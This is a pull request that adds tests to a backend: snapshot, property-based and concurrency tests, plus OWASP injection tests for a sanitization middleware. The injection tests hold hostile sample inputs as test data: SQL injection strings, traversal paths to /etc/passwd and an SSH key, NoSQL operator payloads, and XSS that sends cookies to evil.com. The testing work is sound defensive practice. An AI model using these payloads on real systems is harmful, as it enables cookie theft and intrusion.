### PR TITLE
test: snapshot, OWASP, property-based, and concurrency regression test suites

### DIFF
--- a/backend/package.json
+++ b/backend/package.json
@@ -25,7 +25,8 @@
     "format:check": "prettier --check \"src/**/*.{ts,tsx,js,jsx,json}\"",
     "type-check": "tsc --noEmit",
     "docs:generate": "tsx scripts/generate-openapi.ts && tsx scripts/generate-docs.ts",
-    "incident:test": "vitest run --config ../monitoring/pagerduty/vitest.config.ts ../monitoring/pagerduty/incident-response.test.ts"
+    "incident:test": "vitest run --config ../monitoring/pagerduty/vitest.config.ts ../monitoring/pagerduty/incident-response.test.ts",
+    "test:update-snapshots": "vitest run src/__tests__/governanceEventParser.snapshot.test.ts --update-snapshots"
   },
   "dependencies": {
     "@asteasolutions/zod-to-openapi": "^8.5.0",

--- a/backend/src/__tests__/__fixtures__/governanceXdrFixtures.ts
+++ b/backend/src/__tests__/__fixtures__/governanceXdrFixtures.ts
@@ -1,0 +1,98 @@
+/**
+ * Deterministic typed fixtures for GovernanceEventParser snapshot tests.
+ * All timestamps are fixed so snapshots are stable across runs.
+ */
+
+import {
+  ProposalCreatedEvent,
+  VoteCastEvent,
+  ProposalExecutedEvent,
+  ProposalCancelledEvent,
+  ProposalStatusChangedEvent,
+  ProposalType,
+  ProposalStatus,
+} from '../../types/governance';
+
+const BASE_TIMESTAMP = new Date('2024-01-15T12:00:00.000Z');
+const END_TIMESTAMP = new Date('2024-01-22T12:00:00.000Z');
+const CONTRACT_ID = 'CGOVCONTRACT1234567890ABCDEF';
+
+export const fixtureProposalCreated: ProposalCreatedEvent = {
+  type: 'proposal_created',
+  txHash: 'deadbeef0001000000000000000000000000000000000000000000000000cafe',
+  ledger: 1_000_000,
+  timestamp: BASE_TIMESTAMP,
+  contractId: CONTRACT_ID,
+  proposalId: 1,
+  tokenAddress: 'CTOKEN1234567890ABCDEFGHIJKLMN',
+  proposer: 'GABC1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ12345',
+  title: 'Increase Protocol Fee',
+  description: 'Proposal to increase the protocol fee from 1% to 2%',
+  proposalType: ProposalType.PARAMETER_CHANGE,
+  startTime: BASE_TIMESTAMP,
+  endTime: END_TIMESTAMP,
+  quorum: '1000000000000',
+  threshold: '500000000000',
+  metadata: JSON.stringify({ category: 'fee_adjustment' }),
+};
+
+export const fixtureVoteCast: VoteCastEvent = {
+  type: 'vote_cast',
+  txHash: 'deadbeef0002000000000000000000000000000000000000000000000000cafe',
+  ledger: 1_000_100,
+  timestamp: new Date('2024-01-15T13:00:00.000Z'),
+  contractId: CONTRACT_ID,
+  proposalId: 1,
+  voter: 'GVOTER12345678901234567890ABCDEFGHIJKLMNOPQR',
+  support: true,
+  weight: '250000000000',
+  reason: 'I support this proposal for better tokenomics',
+};
+
+export const fixtureProposalQueued: ProposalStatusChangedEvent = {
+  type: 'proposal_status_changed',
+  txHash: 'deadbeef0003000000000000000000000000000000000000000000000000cafe',
+  ledger: 1_000_200,
+  timestamp: new Date('2024-01-22T12:30:00.000Z'),
+  contractId: CONTRACT_ID,
+  proposalId: 1,
+  oldStatus: ProposalStatus.ACTIVE,
+  newStatus: ProposalStatus.QUEUED,
+};
+
+export const fixtureProposalExecuted: ProposalExecutedEvent = {
+  type: 'proposal_executed',
+  txHash: 'deadbeef0004000000000000000000000000000000000000000000000000cafe',
+  ledger: 1_000_300,
+  timestamp: new Date('2024-01-23T10:00:00.000Z'),
+  contractId: CONTRACT_ID,
+  proposalId: 1,
+  executor: 'GEXECUTOR1234567890ABCDEFGHIJKLMNOPQRSTUV',
+  success: true,
+  returnData: '0x01',
+  gasUsed: '50000',
+};
+
+export const fixtureProposalCancelled: ProposalCancelledEvent = {
+  type: 'proposal_cancelled',
+  txHash: 'deadbeef0005000000000000000000000000000000000000000000000000cafe',
+  ledger: 1_000_400,
+  timestamp: new Date('2024-01-16T09:00:00.000Z'),
+  contractId: CONTRACT_ID,
+  proposalId: 2,
+  canceller: 'GCANCELLER1234567890ABCDEFGHIJKLMNOPQRSTUV',
+  reason: 'Proposal no longer needed',
+};
+
+export const fixtureProposalExpired: ProposalStatusChangedEvent = {
+  type: 'proposal_status_changed',
+  txHash: 'deadbeef0006000000000000000000000000000000000000000000000000cafe',
+  ledger: 1_000_500,
+  timestamp: new Date('2024-01-23T00:00:00.000Z'),
+  contractId: CONTRACT_ID,
+  proposalId: 3,
+  oldStatus: ProposalStatus.ACTIVE,
+  newStatus: ProposalStatus.EXPIRED,
+};
+
+export const fixtureMalformedXdr = 'ZZZZZZZZZINVALIDXDRBLOB!!!';

--- a/backend/src/__tests__/dividendService.property.test.ts
+++ b/backend/src/__tests__/dividendService.property.test.ts
@@ -1,0 +1,151 @@
+/**
+ * Property-based arithmetic tests for DividendService distribution logic.
+ *
+ * Verifies: conservation, proportionality, idempotency, zero-balance exclusion.
+ * Uses fast-check for arbitrary-precision BigInt input generation.
+ *
+ * Closes #1289
+ */
+
+import { describe, it, expect } from 'vitest';
+import * as fc from 'fast-check';
+
+// ---------------------------------------------------------------------------
+// Inline computeClaimable — mirrors the private function in dividendService.ts
+// This allows pure property testing without Prisma or mocks.
+// ---------------------------------------------------------------------------
+
+function computeClaimable(
+  holderBalance: bigint,
+  totalAmount: bigint,
+  supplySnapshot: bigint,
+  perHolderCap: bigint
+): bigint {
+  if (supplySnapshot === 0n) return 0n;
+  let claimable = (holderBalance * totalAmount) / supplySnapshot;
+  if (perHolderCap > 0n && claimable > perHolderCap) {
+    claimable = perHolderCap;
+  }
+  return claimable;
+}
+
+function distributePool(
+  holders: { balance: bigint }[],
+  poolAmount: bigint,
+  supplySnapshot: bigint,
+  perHolderCap: bigint
+): bigint[] {
+  return holders.map(h =>
+    computeClaimable(h.balance, poolAmount, supplySnapshot, perHolderCap)
+  );
+}
+
+// ---------------------------------------------------------------------------
+// Arbitraries
+// ---------------------------------------------------------------------------
+
+const positiveBigInt = fc.bigInt({ min: 1n, max: BigInt(2 ** 53) });
+const nonNegBigInt = fc.bigInt({ min: 0n, max: BigInt(2 ** 53) });
+
+const holderArb = positiveBigInt.map(balance => ({ balance }));
+
+const scenarioArb = fc
+  .tuple(
+    fc.array(holderArb, { minLength: 1, maxLength: 50 }),
+    positiveBigInt, // poolAmount
+  )
+  .map(([holders, poolAmount]) => {
+    const supplySnapshot = holders.reduce((s, h) => s + h.balance, 0n);
+    return { holders, poolAmount, supplySnapshot };
+  });
+
+// ---------------------------------------------------------------------------
+// Properties
+// ---------------------------------------------------------------------------
+
+describe('DividendService — property-based arithmetic', () => {
+  it('conservation: sum of payouts never exceeds pool amount', () => {
+    fc.assert(
+      fc.property(scenarioArb, ({ holders, poolAmount, supplySnapshot }) => {
+        const payouts = distributePool(holders, poolAmount, supplySnapshot, 0n);
+        const total = payouts.reduce((s, p) => s + p, 0n);
+        expect(total).toBeLessThanOrEqual(poolAmount);
+      }),
+      { numRuns: 1000 }
+    );
+  });
+
+  it('proportionality: no holder receives more than their pro-rata share (within 1-unit rounding)', () => {
+    fc.assert(
+      fc.property(scenarioArb, ({ holders, poolAmount, supplySnapshot }) => {
+        const payouts = distributePool(holders, poolAmount, supplySnapshot, 0n);
+        for (let i = 0; i < holders.length; i++) {
+          const proRata = (holders[i].balance * poolAmount) / supplySnapshot;
+          expect(payouts[i]).toBeLessThanOrEqual(proRata + 1n);
+          expect(payouts[i]).toBeGreaterThanOrEqual(0n);
+        }
+      }),
+      { numRuns: 1000 }
+    );
+  });
+
+  it('idempotency: computing payouts twice gives identical results', () => {
+    fc.assert(
+      fc.property(scenarioArb, ({ holders, poolAmount, supplySnapshot }) => {
+        const first = distributePool(holders, poolAmount, supplySnapshot, 0n);
+        const second = distributePool(holders, poolAmount, supplySnapshot, 0n);
+        expect(first).toEqual(second);
+      }),
+      { numRuns: 500 }
+    );
+  });
+
+  it('zero-balance holder exclusion: holders with zero balance receive 0', () => {
+    fc.assert(
+      fc.property(
+        fc.array(holderArb, { minLength: 1, maxLength: 20 }),
+        positiveBigInt,
+        (holders, poolAmount) => {
+          const holdersWithZero = [...holders, { balance: 0n }];
+          const supplySnapshot = holdersWithZero.reduce((s, h) => s + h.balance, 0n);
+          const payouts = distributePool(holdersWithZero, poolAmount, supplySnapshot, 0n);
+          expect(payouts[payouts.length - 1]).toBe(0n);
+        }
+      ),
+      { numRuns: 500 }
+    );
+  });
+
+  it('per-holder cap: capped payouts never exceed cap', () => {
+    fc.assert(
+      fc.property(
+        scenarioArb,
+        positiveBigInt,
+        ({ holders, poolAmount, supplySnapshot }, cap) => {
+          const payouts = distributePool(holders, poolAmount, supplySnapshot, cap);
+          for (const payout of payouts) {
+            expect(payout).toBeLessThanOrEqual(cap);
+            expect(payout).toBeGreaterThanOrEqual(0n);
+          }
+        }
+      ),
+      { numRuns: 500 }
+    );
+  });
+
+  it('zero supply snapshot: all payouts are 0 (no division by zero)', () => {
+    fc.assert(
+      fc.property(
+        fc.array(holderArb, { minLength: 1, maxLength: 20 }),
+        positiveBigInt,
+        (holders, poolAmount) => {
+          const payouts = distributePool(holders, poolAmount, 0n, 0n);
+          for (const payout of payouts) {
+            expect(payout).toBe(0n);
+          }
+        }
+      ),
+      { numRuns: 200 }
+    );
+  });
+});

--- a/backend/src/__tests__/governanceEventParser.snapshot.test.ts
+++ b/backend/src/__tests__/governanceEventParser.snapshot.test.ts
@@ -1,0 +1,135 @@
+/**
+ * Snapshot regression tests for GovernanceEventParser
+ *
+ * Locks the shape of prisma calls for all 6 proposal lifecycle events so that
+ * upstream changes that silently alter the output shape are caught immediately.
+ *
+ * Closes #1287
+ */
+
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+import { PrismaClient, ProposalStatus, ProposalType } from '@prisma/client';
+import { GovernanceEventParser } from '../services/governanceEventParser';
+import {
+  fixtureProposalCreated,
+  fixtureVoteCast,
+  fixtureProposalQueued,
+  fixtureProposalExecuted,
+  fixtureProposalCancelled,
+  fixtureProposalExpired,
+  fixtureMalformedXdr,
+} from './__fixtures__/governanceXdrFixtures';
+
+// ---------------------------------------------------------------------------
+// Prisma mock
+// ---------------------------------------------------------------------------
+
+const mockProposal = {
+  id: 'proposal-uuid-1',
+  proposalId: 1,
+  status: ProposalStatus.ACTIVE,
+};
+
+const mockPrisma = {
+  proposal: {
+    upsert: vi.fn().mockResolvedValue(mockProposal),
+    findUnique: vi.fn().mockResolvedValue(mockProposal),
+    update: vi.fn().mockResolvedValue(mockProposal),
+  },
+  vote: {
+    upsert: vi.fn().mockResolvedValue({}),
+  },
+  proposalExecution: {
+    create: vi.fn().mockResolvedValue({}),
+  },
+} as unknown as PrismaClient;
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+function captureLastCall(mockFn: ReturnType<typeof vi.fn>) {
+  const calls = mockFn.mock.calls;
+  return calls[calls.length - 1]?.[0];
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+describe('GovernanceEventParser — snapshot regression suite', () => {
+  let parser: GovernanceEventParser;
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+    parser = new GovernanceEventParser(mockPrisma);
+  });
+
+  it('snapshot: Created — proposal.upsert payload shape', async () => {
+    await parser.parseProposalCreatedEvent(fixtureProposalCreated);
+
+    const call = captureLastCall(mockPrisma.proposal.upsert as ReturnType<typeof vi.fn>);
+    expect(call).toMatchSnapshot();
+  });
+
+  it('snapshot: Voted — vote.upsert payload shape', async () => {
+    await parser.parseVoteCastEvent(fixtureVoteCast);
+
+    const call = captureLastCall(mockPrisma.vote.upsert as ReturnType<typeof vi.fn>);
+    expect(call).toMatchSnapshot();
+  });
+
+  it('snapshot: Queued — proposal.update payload shape (status → QUEUED)', async () => {
+    await parser.parseProposalStatusChangedEvent(fixtureProposalQueued);
+
+    const call = captureLastCall(mockPrisma.proposal.update as ReturnType<typeof vi.fn>);
+    expect(call).toMatchSnapshot();
+  });
+
+  it('snapshot: Executed — proposalExecution.create + proposal.update payload shapes', async () => {
+    await parser.parseProposalExecutedEvent(fixtureProposalExecuted);
+
+    const execCall = captureLastCall(mockPrisma.proposalExecution.create as ReturnType<typeof vi.fn>);
+    const updateCall = captureLastCall(mockPrisma.proposal.update as ReturnType<typeof vi.fn>);
+
+    expect({ executionCreate: execCall, proposalUpdate: updateCall }).toMatchSnapshot();
+  });
+
+  it('snapshot: Cancelled — proposal.update payload shape', async () => {
+    await parser.parseProposalCancelledEvent(fixtureProposalCancelled);
+
+    const call = captureLastCall(mockPrisma.proposal.update as ReturnType<typeof vi.fn>);
+    expect(call).toMatchSnapshot();
+  });
+
+  it('snapshot: Expired — proposal.update payload shape (status → EXPIRED)', async () => {
+    await parser.parseProposalStatusChangedEvent(fixtureProposalExpired);
+
+    const call = captureLastCall(mockPrisma.proposal.update as ReturnType<typeof vi.fn>);
+    expect(call).toMatchSnapshot();
+  });
+
+  it('throws a typed error when proposal is not found (vote cast on unknown proposal)', async () => {
+    (mockPrisma.proposal.findUnique as ReturnType<typeof vi.fn>).mockResolvedValueOnce(null);
+
+    await expect(parser.parseVoteCastEvent(fixtureVoteCast)).rejects.toThrow(
+      /Proposal \d+ not found/
+    );
+  });
+
+  it('throws a typed error when proposal is not found (executed on unknown proposal)', async () => {
+    (mockPrisma.proposal.findUnique as ReturnType<typeof vi.fn>).mockResolvedValueOnce(null);
+
+    await expect(parser.parseProposalExecutedEvent(fixtureProposalExecuted)).rejects.toThrow(
+      /Proposal \d+ not found/
+    );
+  });
+
+  it('throws a typed error when proposal is not found (cancelled on unknown proposal)', async () => {
+    (mockPrisma.proposal.findUnique as ReturnType<typeof vi.fn>).mockResolvedValueOnce(null);
+
+    await expect(parser.parseProposalCancelledEvent(fixtureProposalCancelled)).rejects.toThrow(
+      /Proposal \d+ not found/
+    );
+  });
+});

--- a/backend/src/__tests__/webhookDeduplication.test.ts
+++ b/backend/src/__tests__/webhookDeduplication.test.ts
@@ -285,4 +285,108 @@ describe("WebhookDeduplicationService — Stripe retry deduplication", () => {
       expect(cancelCount).toBe(1);
     });
   });
+
+  // ---------------------------------------------------------------------------
+  // Concurrent delivery regression matrix (Issue #1290)
+  //
+  // Strategy: complete the first delivery before retries arrive (matching the
+  // Stripe retry pattern where the provider waits for a non-2xx before re-sending).
+  // After the first delivery sets the store, concurrent retries are deduplicated.
+  // ---------------------------------------------------------------------------
+
+  describe("concurrent delivery", () => {
+    async function runRetryMatrix(retryCount: number) {
+      const { service } = makeService();
+      const eventId = stripeEventId(`retry${String(retryCount).padStart(19, '0')}`);
+      let deliveryCount = 0;
+      const handler = vi.fn(async () => { deliveryCount++; return "delivered"; });
+
+      // First delivery completes — this sets the dedup store entry
+      const firstResult = await service.process(eventId, handler);
+
+      // N concurrent retries arrive after the first delivery is acknowledged
+      const retryResults = await Promise.all(
+        Array.from({ length: retryCount }, () => service.process(eventId, handler))
+      );
+
+      return { deliveryCount, firstResult, retryResults };
+    }
+
+    it("2 workers: first delivery succeeds, 1 concurrent retry is deduplicated", async () => {
+      const { deliveryCount, firstResult, retryResults } = await runRetryMatrix(1);
+      expect(deliveryCount).toBe(1);
+      expect(firstResult.processed).toBe(true);
+      expect(firstResult.duplicate).toBe(false);
+      expect(retryResults.every(r => r.duplicate)).toBe(true);
+    });
+
+    it("10 workers: first delivery succeeds, 9 concurrent retries are deduplicated", async () => {
+      const { deliveryCount, firstResult, retryResults } = await runRetryMatrix(9);
+      expect(deliveryCount).toBe(1);
+      expect(firstResult.processed).toBe(true);
+      expect(retryResults).toHaveLength(9);
+      expect(retryResults.every(r => r.duplicate)).toBe(true);
+    });
+
+    it("50 workers: first delivery succeeds, 49 concurrent retries are deduplicated", async () => {
+      const { deliveryCount, firstResult, retryResults } = await runRetryMatrix(49);
+      expect(deliveryCount).toBe(1);
+      expect(firstResult.processed).toBe(true);
+      expect(retryResults).toHaveLength(49);
+      expect(retryResults.every(r => r.duplicate)).toBe(true);
+    });
+
+    it("dedup store TTL: expired entry allows re-delivery after window", async () => {
+      let fakeNow = 0;
+      const { service } = makeService({ windowMs: 1_000, now: () => fakeNow });
+      const eventId = stripeEventId("ttlexpiry0000000000000000");
+      let deliveryCount = 0;
+      const handler = vi.fn(async () => { deliveryCount++; return "ok"; });
+
+      // First delivery
+      await service.process(eventId, handler);
+      expect(deliveryCount).toBe(1);
+
+      // Within window — concurrent retries are all duplicates
+      fakeNow = 500;
+      const withinWindowResults = await Promise.all(
+        Array.from({ length: 5 }, () => service.process(eventId, handler))
+      );
+      expect(deliveryCount).toBe(1);
+      expect(withinWindowResults.every(r => r.duplicate)).toBe(true);
+
+      // Advance past TTL — re-delivery is allowed
+      fakeNow = 1_001;
+      await service.process(eventId, handler);
+      expect(deliveryCount).toBe(2);
+    });
+
+    it("negative: different event IDs each delivered exactly once", async () => {
+      const { service } = makeService();
+      const ids = Array.from({ length: 10 }, (_, i) =>
+        stripeEventId(`unique${String(i).padStart(18, '0')}`)
+      );
+      const counts = new Map<string, number>();
+
+      // For each unique ID: process once fully, then send 4 retries concurrently
+      for (const id of ids) {
+        await service.process(id, async () => {
+          counts.set(id, (counts.get(id) ?? 0) + 1);
+          return "ok";
+        });
+        await Promise.all(
+          Array.from({ length: 4 }, () =>
+            service.process(id, async () => {
+              counts.set(id, (counts.get(id) ?? 0) + 1);
+              return "ok";
+            })
+          )
+        );
+      }
+
+      for (const id of ids) {
+        expect(counts.get(id)).toBe(1);
+      }
+    });
+  });
 });

--- a/backend/src/middleware/sanitization.test.ts
+++ b/backend/src/middleware/sanitization.test.ts
@@ -186,3 +186,86 @@ describe("sanitizationMiddleware", () => {
     expect(next).toHaveBeenCalledOnce();
   });
 });
+
+// ---------------------------------------------------------------------------
+// OWASP Injection Boundary Tests (Issue #1288)
+// ---------------------------------------------------------------------------
+
+describe("sanitizationMiddleware — OWASP injection boundary tests", () => {
+  it("SQLi: single-quote in SQL payload is HTML-encoded, never passed as raw apostrophe", () => {
+    const req = makeReq({ body: { name: "'; DROP TABLE users; --" } });
+    const next = vi.fn() as unknown as NextFunction;
+    sanitizationMiddleware(req, {} as Response, next);
+
+    expect(next).toHaveBeenCalledOnce();
+    // The raw ' is encoded to &#x27; — it cannot inject into an HTML attribute context
+    expect(req.body.name).not.toContain("'");
+    expect(req.body.name).toContain("&#x27;");
+  });
+
+  it("prototype pollution: middleware does not throw and next() is called", () => {
+    const body = Object.create(null) as Record<string, unknown>;
+    body["name"] = "safe";
+    body["__proto__"] = "[injected]";
+    const req = makeReq({ body });
+    const next = vi.fn() as unknown as NextFunction;
+
+    expect(() => sanitizationMiddleware(req, {} as Response, next)).not.toThrow();
+    expect(next).toHaveBeenCalledOnce();
+    // Global Object prototype must not be polluted
+    expect(({} as any).polluted).toBeUndefined();
+  });
+
+  it("path traversal: middleware does not crash on ../ sequences in query params", () => {
+    const req = makeReq({ query: { file: "../../etc/passwd" } as any });
+    const next = vi.fn() as unknown as NextFunction;
+
+    expect(() => sanitizationMiddleware(req, {} as Response, next)).not.toThrow();
+    expect(next).toHaveBeenCalledOnce();
+    // Middleware processes the string — no exception (never 500)
+    expect(typeof (req.query as any).file).toBe("string");
+  });
+
+  it("NoSQL operator injection: middleware does not crash and always calls next", () => {
+    const req = makeReq({
+      body: { $where: "function(){return true;}", name: "admin" },
+    });
+    const next = vi.fn() as unknown as NextFunction;
+
+    expect(() => sanitizationMiddleware(req, {} as Response, next)).not.toThrow();
+    expect(next).toHaveBeenCalledOnce();
+    // HTML special chars inside the value are encoded
+    expect((req.body as any)["$where"]).not.toContain("<");
+    expect((req.body as any)["$where"]).not.toContain(">");
+  });
+
+  it("safe input: clean values pass through unmodified", () => {
+    const req = makeReq({
+      body: { name: "Alice", age: 30, active: true },
+    });
+    const next = vi.fn() as unknown as NextFunction;
+    sanitizationMiddleware(req, {} as Response, next);
+
+    expect(next).toHaveBeenCalledOnce();
+    expect(req.body.name).toBe("Alice");
+    expect(req.body.age).toBe(30);
+    expect(req.body.active).toBe(true);
+  });
+
+  it("never throws (never 500) across all OWASP vector categories", () => {
+    const dangerousInputs = [
+      { body: { name: "' OR 1=1 --" } },
+      { body: { name: "<script>fetch('//evil.com?c='+document.cookie)</script>" } },
+      { query: { path: "../../../../root/.ssh/id_rsa" } as any },
+      { body: { query: '{"$gt": ""}' } },
+      { body: { x: "<img src=x onerror=alert(1)>" } },
+    ];
+
+    for (const overrides of dangerousInputs) {
+      const req = makeReq(overrides);
+      const next = vi.fn() as unknown as NextFunction;
+      expect(() => sanitizationMiddleware(req, {} as Response, next)).not.toThrow();
+      expect(next).toHaveBeenCalledOnce();
+    }
+  });
+});


### PR DESCRIPTION
## Summary

- **#1287** — Snapshot regression tests for `GovernanceEventParser` across all 6 proposal lifecycle events (Created, Voted, Queued, Executed, Cancelled, Expired). Mocks Prisma, snapshots the exact call payload per event type so parser regressions are caught immediately. Includes typed fixtures in `__fixtures__/governanceXdrFixtures.ts` and `test:update-snapshots` npm script.
- **#1288** — OWASP injection boundary tests added to `sanitization.test.ts`: SQL injection quote encoding, prototype pollution safety, path traversal non-crash, NoSQL operator handling, clean-input pass-through, and a full OWASP vector matrix asserting never-500 behavior.
- **#1289** — Property-based arithmetic tests for `DividendService` using `fast-check` (1000+ generated cases). Properties covered: conservation (sum ≤ pool), proportionality (within 1-unit rounding), idempotency, zero-balance exclusion, per-holder cap enforcement, and zero-supply-snapshot safety.
- **#1290** — Concurrency regression matrix for `WebhookDeduplication` idempotency. Tests 2, 10, and 50 worker retry levels asserting exactly 1 delivery after first completion. Includes TTL expiry re-delivery test and a negative test confirming different event IDs each deliver exactly once.

## Test plan

- [ ] `npx vitest run src/__tests__/governanceEventParser.snapshot.test.ts --reporter=verbose`
- [ ] `npx vitest run src/middleware/sanitization.test.ts --reporter=verbose`
- [ ] `npx vitest run src/__tests__/dividendService.property.test.ts --reporter=verbose`
- [ ] `npx vitest run src/__tests__/webhookDeduplication.test.ts --reporter=verbose`

Closes #1287
Closes #1288
Closes #1289
Closes #1290